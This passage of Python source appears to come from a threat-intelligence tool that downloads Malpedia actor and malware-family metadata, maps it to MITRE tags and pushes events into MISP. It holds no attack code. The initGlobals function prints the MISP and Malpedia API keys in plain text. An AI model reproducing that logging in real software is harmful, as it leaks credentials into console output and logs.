    db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_NAME_STR, "ACTOR")
    # GET / INSERT MITRE GROUP DATA
    knownGroupCodes = set()
    group_code = ""
    if gv._CURRENT_ACTOR_MITRE_GROUP_CODE == "NONE":
        try:
            gv._CURRENT_ACTOR_MITRE_GROUP_CODE = mf.get_group_code(gv._CURRENT_ACTOR_NAME_STR)
        except:
            gv._CURRENT_ACTOR_MITRE_GROUP_CODE = "NONE"
    group_code = gv._CURRENT_ACTOR_MITRE_GROUP_CODE
    if group_code != "NONE":
        knownGroupCodes.add(group_code)
    # GET MITRE GALAXY TAG:
    mitre_tag = []
    try:
        mitre_tag = db.get_galaxy_specific_tags(group_code, "mitre-intrusion-set")
    except Exception as e:
        print(e)
        mitre_tag = []
    for tag in mitre_tag:
        iGalaxy = tag["galaxy"]
        iTag = tag["tag"]
        db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
    # GET ACTOR MITRE DATA TECHNIQUES
    groupMitreTechniques = []
    if len(gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS) == 0:
        # NOTE(review): this looks up techniques by
        # gv._CURRENT_ACTOR_FAMILIES_CURRENT_FAMILY_STR (a family name) rather
        # than the actor name, and on this branch groupMitreTechniques stays
        # empty so no technique tags are built below — confirm intended.
        gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS = mf.get_group_technique_ids(gv._CURRENT_ACTOR_FAMILIES_CURRENT_FAMILY_STR)
    else:
        groupMitreTechniques = gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS
    groupMitreTags = []
    if len(gv._CURRENT_ACTOR_TECHNIQUE_TAGS) == 0:
        for tID in groupMitreTechniques:
            retTags = db.get_galaxy_specific_tags(tID)
            gv._CURRENT_ACTOR_TECHNIQUE_TAGS.append(retTags)
    else:
        groupMitreTags = gv._CURRENT_ACTOR_TECHNIQUE_TAGS
    for tag in groupMitreTags:
        for sub in tag:
            iGalaxy = sub["galaxy"]
            iTag = sub["tag"]
            db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
    # SHORT NAME
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR SHORT NAME: {}".format(threat_actor))
    db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", threat_actor, "ACTOR")
    # COUNTRY SPONSOR
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR COUNTRY SPONSOR: {}".format(gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR))
    db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR, "COUNTRY_SPONSOR")
    # TYPES OF INCIDENTS
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: TYPES OF INCIDENTS: {}".format(gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR))
    db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR, "TYPE_OF_INCIDENT")
    # ISO COUNTRY (2 CHARACTER)
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ISO COUNTRY (2 CHARACTER): {}".format(gv._CURRENT_ACTOR_META_COUNTRY_STR))
    db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_META_COUNTRY_STR, "ISO_COUNTRY")
    # For every synonym, also try to pull MITRE data registered under that
    # alternative name and fold in any tags not seen yet.
    altActorTechniqueIDs = []
    altActorTechniqueTags = set()
    currentActorMetaSynonyms = set(gv._CURRENT_ACTOR_META_SYNONYMS_LIST)
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ALT NAMES FOR THREAT ACTOR")
        print(*currentActorMetaSynonyms, sep = "\n")
    for value in currentActorMetaSynonyms:
        db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", value, "ACTOR")
        # GET / INSERT MITRE GROUP DATA
        group_code = ""
        if gv._DEBUG:
            print("f(x) build_actor_malware_tree: GETTING MITRE GROUP DATA")
        try:
            group_code = mf.get_group_code(value)
        except:
            group_code = gv._CURRENT_ACTOR_MITRE_GROUP_CODE
        # IF IT IS NOT ONE WE ALREADY HAVE
        if group_code != "NONE" and gv._CURRENT_ACTOR_MITRE_GROUP_CODE != "NONE" and group_code not in knownGroupCodes:
            knownGroupCodes.add(group_code)
            if gv._DEBUG:
                print("f(x) build_actor_malware_tree: ADDING GROUP CODE: {}".format(group_code))
            # GET MITRE GALAXY TAG:
            mitre_tag = []
            try:
                mitre_tag = db.get_galaxy_specific_tags(group_code, "mitre-intrusion-set")
            except Exception as e:
                print("f(x) build_actor_malware_tree: {}".format(e))
                mitre_tag = []
            for tag in mitre_tag:
                iGalaxy = tag["galaxy"]
                iTag = tag["tag"]
                db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
                if gv._DEBUG:
                    print("f(x) build_actor_malware_tree: INSERT GALAXY: {} TAG: {}".format(iGalaxy, iTag))
            altActorTechniqueIDs = mf.get_group_technique_ids(value)
            for tID in altActorTechniqueIDs:
                retTags = db.get_galaxy_specific_tags(tID)
                # INSERT NEWLY DISCOVERED TAGS INTO DATABASE
                for sub in retTags:
                    if sub["uuid"] not in altActorTechniqueTags:
                        altActorTechniqueTags.add(sub["uuid"])
                        iGalaxy = sub["galaxy"]
                        iTag = sub["tag"]
                        db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
                        if gv._DEBUG:
                            print("f(x) build_actor_malware_tree: CORRELATING TAG FROM ALT NAME: {} GALAXY: {} TAG: {}".format(value, iGalaxy, iTag))
        else:
            if gv._DEBUG:
                print("f(x) build_actor_malware_tree: DUPLICATE GROUP CODE SKIPPED")
    # VICTIMS
    for value in gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST:
        if gv._DEBUG:
            print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR VICTIMS: {}".format(value))
        db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", value, "VICTIMS")
    # TARGETS
    for value in gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST:
        if gv._DEBUG:
            print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: TARGET: {}".format(value))
        db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", value, "TARGETS")
    # Main actor row with everything extracted above.
    db.insert_actor(gv._CURRENT_ACTOR_UUID_STR, \
                    threat_actor, \
                    gv._CURRENT_ACTOR_NAME_STR, \
                    gv._CURRENT_ACTOR_META_COUNTRY_STR, \
                    gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR, \
                    gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR, \
                    gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR, \
                    gv._CURRENT_ACTOR_META_SINCE_STR, \
                    gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR, \
                    gv._CURRENT_ACTOR_META_CAPABILITIES_STR, \
                    lastupdated, \
                    gv._CURRENT_ACTOR_DESCRIPTION_STR )
    # ---------------------------------------------------------------------
    # ACTOR_CFRSUSPECTEDVICTIMS
    for victim in gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST:
        if gv._DEBUG:
            print("f(x) build_actor_malware_tree: INSERT TAG: VICTIM: VICTIM: {}".format(victim))
        db.insert_victims(gv._CURRENT_ACTOR_UUID_STR, victim)
    # ---------------------------------------------------------------------
    # REFERENCES
    for reference in gv._CURRENT_ACTOR_META_REFS_LIST:
        if gv._DEBUG:
            print ("f(x) build_actor_malware_tree: INSERT REFERENCE: {}".format(reference))
        db.insert_reference(gv._CURRENT_ACTOR_UUID_STR, reference)
    # ---------------------------------------------------------------------
    # ACTOR_CFRTARGETCATEGORY
    for targetcategory in gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST:
        if gv._DEBUG:
            print ("f(x) build_actor_malware_tree: INSERT TARGET CATEGORY: {}".format(targetcategory))
        db.insert_target(gv._CURRENT_ACTOR_UUID_STR,targetcategory)
    # ---------------------------------------------------------------------
    # ACTOR SYNONYMS
    for synonym in gv._CURRENT_ACTOR_META_SYNONYMS_LIST:
        if gv._DEBUG:
            print ("f(x) build_actor_malware_tree: INSERT ACTOR SYNONYM: {}".format(synonym))
        db.insert_synonym(gv._CURRENT_ACTOR_UUID_STR, synonym, "ACTOR")
    # ---------------------------------------------------------------------
    # END ACTOR META DATA DB INSERT
    # ---------------------------------------------------------------------
    # Root record: the actor has no parent in the tree.
    db.insert_parent_child(gv._CURRENT_ACTOR_UUID_STR, \
                           "", \
                           threat_actor,
                           "", \
                           False, \
                           "", \
                           "", \
                           "", \
                           "ACTOR", \
                           "NONE")
def stageActorMalwareMeta():
    """Download every Malpedia actor profile to JSON on disk.

    Fetches the actor list into gv._ACTORS_LIST, persists it to
    001.actors.json, then pulls each actor profile while throttling to stay
    under the Malpedia API rate limit. Progress is tracked in
    001.completed.actors.json so an interrupted run can resume without
    re-downloading profiles already on disk. Exits the process on error.
    """
    # BEGIN DOWNLOADING ALL ACTORS
    print("f(x) stageActorMalwareMeta: GETTING A LIST OF THREAT ACTORS FROM MALPEDIA")
    mpClient = Authenticate()
    gv._ACTORS_LIST = mpClient.list_actors()
    print("f(x) stageActorMalwareMeta: RETRIEVED LIST OF THREAT ACTORS FROM MALPEDIA")
    # WRITE OUT OUTPUT (context manager closes the file; no manual close needed)
    with open(gv._MALPEDIA_OUTPUT + "actors/" + "001.actors.json", 'w') as jsonOut:
        jsonOut.write(json.dumps(gv._ACTORS_LIST))
    # BEGIN ACTOR/MALWARE METADATA SECTION
    try:
        # DOWNLOAD ACTOR PROFILES AND WRITE THEM TO JSON
        # THROTTLE SO IT DOESN'T LOCK API KEY
        max_requests_per_minute = 40  # 60 requests per minute is the hard API max
        current_request_count = 0
        completed_actors_list = []
        # MAKE THE COMPLETED FILE IF IT DOESN'T EXIST
        completed_actors_file_path = gv._MALPEDIA_OUTPUT + "actors/" + "001.completed.actors.json"
        if os.path.isfile(completed_actors_file_path):
            with open(completed_actors_file_path, 'r') as jsonIn:
                completed_actors_list = json.loads(fix_json(jsonIn.read()))
        else:
            # BUG FIX: this file was previously seeded with json.dumps(" ") — a
            # JSON *string* — which made the later `actor_id in ...` membership
            # test a substring check. Seed with an empty JSON list instead.
            with open(completed_actors_file_path, 'w') as jsonOut:
                jsonOut.write(json.dumps([]))
        tStart = time.time()
        iWait = 140  # seconds to spread max_requests_per_minute pulls over
        for actor_id in gv._ACTORS_LIST:
            # Skip profiles already downloaded by an earlier (interrupted) run.
            if actor_id in completed_actors_list:
                continue
            with open(gv._MALPEDIA_OUTPUT + "actors/" + actor_id + ".json", 'w') as jsonOut:
                print("f(x) stageActorMalwareMeta: PULLING DATA FOR ACTOR: {}".format(actor_id))
                mpClient = Authenticate()
                gv._CURRENT_ACTOR_INFO_DICT = mpClient.get_actor(actor_id)
                jsonOut.write(json.dumps(gv._CURRENT_ACTOR_INFO_DICT))
            current_request_count += 1
            # BUG FIX: record EVERY completed pull. Previously the pull that
            # tripped the throttle threshold was never appended to the
            # completed list (and the file handle was never closed because
            # `.close` lacked parentheses), so it was re-downloaded on resume.
            completed_actors_list.append(actor_id)
            with open(completed_actors_file_path, 'w') as completed_actors_file:
                completed_actors_file.write(json.dumps(completed_actors_list))
            # DEBUG SEQ
            if gv._DEBUG:
                print("f(x) stageActorMalwareMeta: {}: ADDED TO COMPLETED ACTORS.".format(actor_id))
            tDiff = time.time() - tStart
            if current_request_count >= max_requests_per_minute and tDiff <= iWait:
                print("f(x) stageActorMalwareMeta: API PULL THRESHHOLD REACHED.")
                # Sleep out the remainder of the throttle window.
                while tDiff <= iWait:
                    time.sleep(1)
                    tDiff = time.time() - tStart
                    print("f(x) stageActorMalwareMeta: WAITING {} SECONDS.".format(math.ceil(iWait - tDiff)))
                tStart = time.time()
                current_request_count = 0
                print("f(x) stageActorMalwareMeta: RESUMING PULLS")
        print("f(x) stageActorMalwareMeta: COMPLETED DOWNLOAD OF ACTOR META INFO")
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) stageActorMalwareMeta ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)
def initGlobals():
    """Validate credentials/connectivity and stage the working environment.

    Reads MISP_KEY, MISP_URL and MALPEDIA_KEY from the environment, smoke-tests
    connectivity to both MISP and Malpedia, inserts the manual tags, loads the
    MITRE software aliases, creates the Malpedia output directories, and
    populates gv._DIR_MALPEDIA_GIT_LIST from the repository tree.

    :returns: 1 on any failure; None once the environment is staged.
    """
    if os.getenv('MISP_KEY') and os.getenv("MISP_URL") and os.getenv("MALPEDIA_KEY"):
        # Strip any quotes that were exported around the values.
        gv._MISP_KEY = os.getenv('MISP_KEY').replace("\'", "").replace("\"", "")
        gv._MISP_URL = os.getenv('MISP_URL').replace("\'", "").replace("\"", "")
        gv._MALPEDIA_KEY = os.getenv('MALPEDIA_KEY').replace("\'", "").replace("\"", "")
        print("f(x) initGlobals: KEYS SET:\n\tMISP KEY: {}\n\tMISP URL: {}\n\tMALPEDIA KEY: {}".format(gv._MISP_KEY, gv._MISP_URL, gv._MALPEDIA_KEY))
    else:
        print("f(x) initGlobals: INVALID MISP_KEY, MISP_URL, AND/OR MALPEDIA KEY. EXITING")
        return 1
    print("f(x) initGlobals: TESTING CONNECTIVITY TO MISP:", end=' ')
    try:
        mispDB = pm.ExpandedPyMISP(url=gv._MISP_URL, key=gv._MISP_KEY, ssl=gv._MISP_VERIFYCERT, debug=gv._DEBUG)
        result = mispDB.get_user()
        if result:
            print("PASSED")
        else:
            # BUG FIX: a falsy result previously printed nothing and staging
            # continued against an unusable MISP instance.
            print("FAILED")
            return 1
    except Exception as e:
        print("FAILED")
        # Surface the underlying error instead of discarding it.
        print("f(x) initGlobals: MISP CONNECTION ERROR: {}".format(e))
        return 1
    print("f(x) initGlobals: TESTING CONNECTIVITY TO MALPEDIA:", end=' ')
    try:
        mpClient = Authenticate()
        result = mpClient.list_samples("win.sslmm")
        if result:
            print("PASSED")
        else:
            print("FAILED")
            return 1
    except Exception as e:
        print("FAILED")
        print("f(x) initGlobals: MALPEDIA CONNECTION ERROR: {}".format(e))
        return 1
    # ADD MANUAL TAGS
    print("f(x) initGlobals: INSERTING MANUAL TAGS")
    db.insert_manual_tags()
    # NOTE: cloning/pulling of the MISP galaxy, Malpedia, and MITRE git repos is
    # intentionally disabled here (see git_actions.clone_misp_galaxy,
    # git_actions.pull_malpedia_git and git_actions.clone_mitre_git).
    # LOAD MITRE SOFTWARE
    print("f(x) initGlobals: LOADING MITRE SOFTWARE ALIASES INTO DB")
    mf.load_mitre_software()
    print("f(x) initGlobals: LOADED MITRE SOFTWARE ALIASES INTO DB")
    # CREATE OUTPUT DIRECTORIES IF THEY DON'T EXIST
    # exist_ok avoids the racy exists-then-makedirs pattern.
    for subdir in ("", "actors", "malware"):
        os.makedirs(gv._MALPEDIA_OUTPUT + subdir, exist_ok=True)
    # GET NAME OF MALWARE FAMILIES FROM DIRECTORY LISTING
    for name in glob.glob(gv._MALPEDIA_REPOSITORY + "**", recursive=True):
        if "yara" not in name and ".json" not in name:
            gv._DIR_MALPEDIA_GIT_LIST.append(name)
    gv._DIR_MALPEDIA_GIT_LIST.sort()
    if gv._DEBUG:
        print(*gv._DIR_MALPEDIA_GIT_LIST, sep="\n")
    print("f(x) initGlobals: STAGED ENVIRONMENT")
def stageThreatActors():
    """Ingest every actor in gv._ACTORS_LIST into the database."""
    for threat_actor in gv._ACTORS_LIST:
        if gv._DEBUG:
            print("INGESTING ACTOR INTO DATABASE: {}".format(threat_actor))
        build_actor_malware_tree(threat_actor)
def removeDuplicates(iUUID, x, lenList):
    """Record iUUID in gv._UUIDS when MISP does not already know it.

    :param iUUID: candidate event UUID to check via mef.uuidSearch.
    :param x: 1-based position in the batch (progress reporting only).
    :param lenList: batch size (progress reporting only).
    :returns: True after the check; exits the process on error.
    """
    try:
        if mef.uuidSearch(iUUID) == 0:
            print("f(x) removeDuplicates: FOUND UNIQUE UUID {}/{}: {}".format(x, lenList, iUUID))
            gv._UUIDS.append(iUUID)
        else:
            print("f(x) removeDuplicates: REMOVED DUPLICATE UUID {}/{}: {}".format(x, lenList, iUUID))
        return True
    except Exception as err:
        print("f(x) removeDuplicates: ERROR: {}".format(err))
        sys.exit(err)
def pushNewEventsIntoMisp(iUUIDS, update=False):
    """Create (or update) MISP events for a batch of UUID records.

    :param iUUIDS: iterable of dict-like records carrying a "uuid" key.
    :param update: when False, duplicate UUIDs already in MISP are filtered
        out concurrently first; when True, all UUIDs are processed and
        existing events are updated instead of skipped.

    Side effects: uses gv._UUIDS and gv._THREAD_LIST as shared scratch state
    and fans the duplicate checks out via the module-level ``executor``
    (presumably a concurrent.futures executor, given cf.wait — confirm).
    Exits the process on any error.
    """
    try:
        gv._UUIDS = []
        oUUIDs = []
        # ATTEMPT TO TRIM DOWN LIST IF THIS IS NOT AN UPDATE EVENT
        x = 0
        lenIUUIDS = len(iUUIDS)
        if update == False:
            print("f(x) pushNewEventsIntoMisp: CHECKING AND REMOVING DUPLICATES.")
            for oUUID in iUUIDS:
                x += 1
                # removeDuplicates(oUUID["uuid"])
                # Each worker appends UUIDs unknown to MISP onto gv._UUIDS.
                gv._THREAD_LIST.append(executor.submit(removeDuplicates, oUUID["uuid"], x, lenIUUIDS))
                # print("f(x) pushNewEventsIntoMisp {}/{}: CHECKING: {}".format(x , lenIUUIDS, oUUID["uuid"]))
            oUUIDs = gv._UUIDS
        else:
            x = 0
            for oUUID in iUUIDS:
                x += 1
                gv._UUIDS.append(oUUID["uuid"])
                print("f(x) pushNewEventsIntoMisp: UNIQUE UUID ADDED {}/{}: {}".format(x, x, oUUID["uuid"]))
        # Block until all duplicate-check futures finish before reading
        # gv._UUIDS (a no-op on the update path where no futures were queued).
        cf.wait(gv._THREAD_LIST)
        gv._THREAD_LIST = []
        oUUIDs = gv._UUIDS
        gv._UUIDS = []
        x = 0
        lengvUUIDS = len(oUUIDs)
        print("f(x) pushNewEventsIntoMisp: PROCESSING {} EVENTS".format(lengvUUIDS))
        for oUUID in oUUIDs:
            x += 1
            # HAVE TO GET COUNT IN CASE THIS IS AN UPDATE EVENT TO DETERMINE IF YOU NEED TO UPDATE OR INSERT
            countUUID = mef.uuidSearch(oUUID)
            # UUID NOT FOUND SO CREATE IT
            if countUUID == 0:
                if gv._DEBUG:
                    print("f(x) pushNewEventsIntoMisp {}/{}: CREATING MISP EVENT FOR UUID: {}".format(x, lengvUUIDS, oUUID))
                # CREATE A MISP EVENT
                mef.createIncident(oUUID, False)
                # threads.append(eventThread)
            # UUID IS FOUND SO SKIP IT SINCE THIS IS THE FIRST RUN
            else:
                if update == True:
                    if gv._DEBUG:
                        print("f(x) pushNewEventsIntoMisp {}/{}: UPDATING MISP EVENT FOR UUID: {}".format(x, lengvUUIDS, oUUID))
                    mef.createIncident(oUUID, True)
                else:
                    print("f(x) pushNewEventsIntoMisp {}/{}: DUPLICATE EVENT DETECTED. UUID: {}".format(x, lengvUUIDS,oUUID))
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) pushNewEventsIntoMisp: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)
def stageUnattributedActor():
    """Create the UNATTRIBUTED and ERROR placeholder actors in the database.

    UNATTRIBUTED is the fallback attribution for families with no actor;
    ERROR is the fallback when actor lookup fails. Exits the process on error.
    """
    try:
        # Both placeholders are identical except for the name, so the
        # previously duplicated insert blocks are factored into one helper.
        _stagePlaceholderActor("UNATTRIBUTED")
        _stagePlaceholderActor("ERROR")
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) stageUnattributedActor: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)


def _stagePlaceholderActor(myName):
    # Insert one placeholder actor row plus its root parent/child record.
    if gv._DEBUG:
        print("f(x) stageUnattributedActor: INITIALIZING DATA FOR: {}".format(myName))
    myUUID = str(uuid.uuid4())
    # Name, common name and description are all the placeholder name; every
    # other meta field is empty, matching the original per-name blocks.
    db.insert_actor(myUUID, myName, myName, "", "", "", "", "", "", "", datetime.date.today(), myName)
    db.insert_parent_child(myUUID, "", myName, "NONE", 0, "", "", "", "ACTOR", "NONE")
def stageMalwareFamilies():
    """Discover malware family names from the repository paths and stage any
    family the database does not yet know via insertFamilyIntoDB().

    Exits the process on error.
    """
    try:
        malwareFamilySet = set()
        checkedSet = set()
        # Family short names sit at a fixed depth in every repository path.
        depth = gv._CURRENT_DIR_DEPTH
        for entry in gv._DIR_MALPEDIA_GIT_LIST:
            parts = entry.split("/")
            if len(parts) <= depth:
                continue
            candidate = parts[depth - 1]
            # Each candidate is examined (and the DB queried) at most once.
            if candidate in malwareFamilySet or candidate in checkedSet:
                continue
            checkedSet.add(candidate)
            if not db.get_parent_child_data(iValue=candidate):
                # Not stored yet — queue it for staging.
                malwareFamilySet.add(candidate)
                if gv._DEBUG:
                    print("f(x) stageMalwareFamilies(): FOUND FAMILY IN PATH: {}".format(candidate))
        for family in malwareFamilySet:
            print("f(x) stageMalwareFamilies(): STAGING DATA FOR FAMILY: {}".format(family))
            insertFamilyIntoDB(family)
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) stageMalwareFamilies(): {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)
def getFamilyInformation(iFamilyName):
    """Load and parse <repo>/<family>/<family>.json from the Malpedia checkout.

    :param iFamilyName: Malpedia short name of the malware family.
    :returns: the parsed family dict, or the string "NONE" when the JSON file
        does not exist on disk. Exits the process on parse/IO errors.
    """
    try:
        # GET THE FAMILY JSON FILE
        malware_family_json = gv._MALPEDIA_REPOSITORY + iFamilyName + "/" + iFamilyName + ".json"
        isFile = os.path.isfile(malware_family_json)
        if gv._DEBUG:
            print("f(x) getFamilyInformation(): GETTING FAMILY INFORMATION FOR:\nFAMILY: {}\nPATH: {}".format(iFamilyName, malware_family_json))
        if isFile:
            with open(malware_family_json, 'r') as jsonIn:
                # # IN ORDER TO 'FIX' ERRONEOUSLY FORMATTED JSON, YOU HAVE TO FIRST IMPORT THE FILE INTO YAML, THEN INTO JSON
                # yamlData = yaml.safe_load(jsonIn)
                # jsonData = json.dumps(yamlData)
                # fix_json(jsonIn)
                if gv._DEBUG:
                    # NOTE(review): this prints the file object's repr, not the
                    # JSON text — presumably intended only as a trace marker.
                    print("f(x) getFamilyInformation() JSON DATA: {}".format(jsonIn))
                # NOTE(review): fix_json() receives the open file object here,
                # while other call sites pass a string from .read() — confirm
                # fix_json handles both input types.
                malware_family_data = json.loads(fix_json(jsonIn))
                jsonIn.close()
        else:
            return "NONE"
        return malware_family_data
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) getFamilyInformation ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)
def insertFamilyIntoDB(iFamilyName):
    """Insert one malware family's metadata, relationships, and tags into the DB.

    Loads the family's Malpedia JSON via getFamilyInformation(), resolves the
    attributed threat actor (falling back to the UNATTRIBUTED / ERROR
    placeholder actors), then inserts the family meta row, the actor<->family
    parent/child link, attributions, synonyms, references, yara rule paths,
    and MALWARE / ACTOR / GALAXY (MITRE software and technique) tags.
    Exits the process on unexpected errors.

    :param iFamilyName: Malpedia short name of the family (its directory name).
    """
    threat_actor = ""
    threat_actor_UUID = ""
    try:
        malwareFamilyDict = getFamilyInformation(iFamilyName)
        malwareFamilyMitreSoftwareTags = []
        malwareFamilyMitreSoftwareTechniqueTags = []
        malwareFamilyAltNamesMitreSpecificTags = []
        actor_data = ""
        # STRING OF COMMON NAME OF THIS MALWARE FAMILY
        try:
            commonName = malwareFamilyDict["common_name"].strip()
            print("f(x) insertFamilyIntoDB: IMPORTING MALWARE: {}".format(commonName.upper()))
        except Exception:
            commonName = ""
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY COMMON NAME: {}".format(commonName))
        # LIST OF THE ALT NAMES ASSOCIATED WITH THIS MALWARE FAMILY
        try:
            altNames = malwareFamilyDict["alt_names"]
        except Exception:
            altNames = []
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY ALT NAMES:")
            print(*altNames, sep = "\n")
        # STRING OF ATTRIBUTION OF THIS MALWARE FAMILY
        try:
            attribution = malwareFamilyDict["attribution"]
        except Exception:
            attribution = []
        # IF NO ATTRIBUTION SET IT TO BE ATTRIBUTED TO BE UNATTRIBUTED
        if len(attribution) == 0:
            attribution = ["UNATTRIBUTED"]
            threat_actor = "UNATTRIBUTED"
        for attributed in attribution:
            actor_data = db.get_actor_meta(iCommonName=attributed)
            # ONLY GET THE FIRST ONE (the finally/break exits after the first
            # attribution, whether or not the lookup succeeded)
            try:
                threat_actor = actor_data["shortname"]
                threat_actor_UUID = actor_data["uuid"]
            except Exception:
                # Lookup failed — fall back to the ERROR placeholder actor.
                actor_data = db.get_actor_meta(iCommonName="ERROR")
                threat_actor = actor_data["shortname"]
                threat_actor_UUID = actor_data["uuid"]
            finally:
                break
        if gv._DEBUG:
            print("f(x) stageMalwareFamilies(): LOOKING FOR THREAT ACTOR: [{}]: UUID: [{}]".format(threat_actor, threat_actor_UUID))
        # STRING OF DESCRIPTION OF THIS MALWARE FAMILY
        try:
            malwareDescription = malwareFamilyDict["description"].strip()
        except Exception:
            malwareDescription = ""
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY DESCRIPTION: {}".format(malwareDescription))
        # STRING OF UUID OF CURRENT MALWARE FAMILY
        try:
            malwareUUID = malwareFamilyDict["uuid"].strip()
        except Exception as e:
            exc_type, _, exc_tb = sys.exc_info()
            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
            print("f(x) insertFamilyIntoDB: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
            malwareUUID = ""
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY UUID: {}".format(malwareUUID))
        # STRING OF WHEN THIS FAMILY WAS LAST UPDATED
        try:
            malwareUpdated = malwareFamilyDict["updated"].strip()
        except Exception:
            malwareUpdated = ""
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY LAST UPDATED: {}".format(malwareUpdated))
        # BUILD YARA PATH DICT: maps yara rule path -> TLP level from the path
        malwareYaraDict = {}
        try:
            for name in set(glob.glob(gv._MALPEDIA_REPOSITORY + "/" + iFamilyName + "/yara/tlp_*/*")):
                tlp = name.split("/")[gv._TLP_SPLIT_DEPTH]
                malwareyarapath = name
                malwareYaraDict[malwareyarapath] = tlp
        except Exception:
            # BUG FIX: was `except Error as e:` — `Error` appears undefined in
            # this scope, which would raise NameError if the body ever failed.
            malwareYaraDict = {}
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY TLP AND YARA FILES")
            print(json.dumps(malwareYaraDict, indent=4))
        # LIST OF THE URLS ASSOCIATED WITH THIS MALWARE FAMILY
        try:
            malwareURLs = malwareFamilyDict["urls"]
        except Exception:
            malwareURLs = []
        # DEBUG SEQ
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: FAMILY URLS")
            print(*malwareURLs, sep = "\n")
        # ---------------------------------------------------------------------
        # BEGIN INSERT MALWARE METADATA INTO DB
        # ---------------------------------------------------------------------
        # TAGS FOR MALWARE
        # ---------------------------------------------------------------------
        # ATTRIBUTION: tag the family with every synonym of its actor
        threat_actor_all_syn = db.get_synonyms(threat_actor_UUID)
        threat_actor_set = set()
        for synonym in threat_actor_all_syn:
            threat_actor_set.add(synonym["synonym"])
        for value in threat_actor_set:
            if gv._DEBUG:
                print("f(x) insertFamilyIntoDB: INSERT TAG: ACTOR: ACTOR SYNONYMS: {}".format(value))
            db.insert_tag(malwareUUID, "", value, "ACTOR")
        # ACTOR FAMILY RELATIONSHIP (PARENT AND CHILD UUIDS)
        db.insert_parent_child(malwareUUID, threat_actor_UUID, iFamilyName, threat_actor, False, "", "", "", "FAMILY", "ACTOR")
        # MALWARE META
        db.insert_malware_meta( malwareUUID, iFamilyName, commonName, malwareDescription, malwareUpdated)
        # MALWARE ATTRIBUTION
        for attributed in attribution:
            db.insert_malware_attribution(malwareUUID, attributed)
        # MALWARE SYNONYMS
        for altname in altNames:
            db.insert_synonym(malwareUUID, altname, "MALWARE")
        # MALWARE REFERENCES
        for url in malwareURLs:
            db.insert_reference(malwareUUID, url)
            # DEBUG SEQ
            if gv._DEBUG:
                print("f(x) insertFamilyIntoDB: {}: {}".format(malwareUUID, url))
        # MALWARE YARA PATH
        for key, value in malwareYaraDict.items():
            myUUID = str(uuid.uuid4())
            db.insert_malware_yara(malwareUUID, value, key, myUUID)
        # MALWARE TAGS
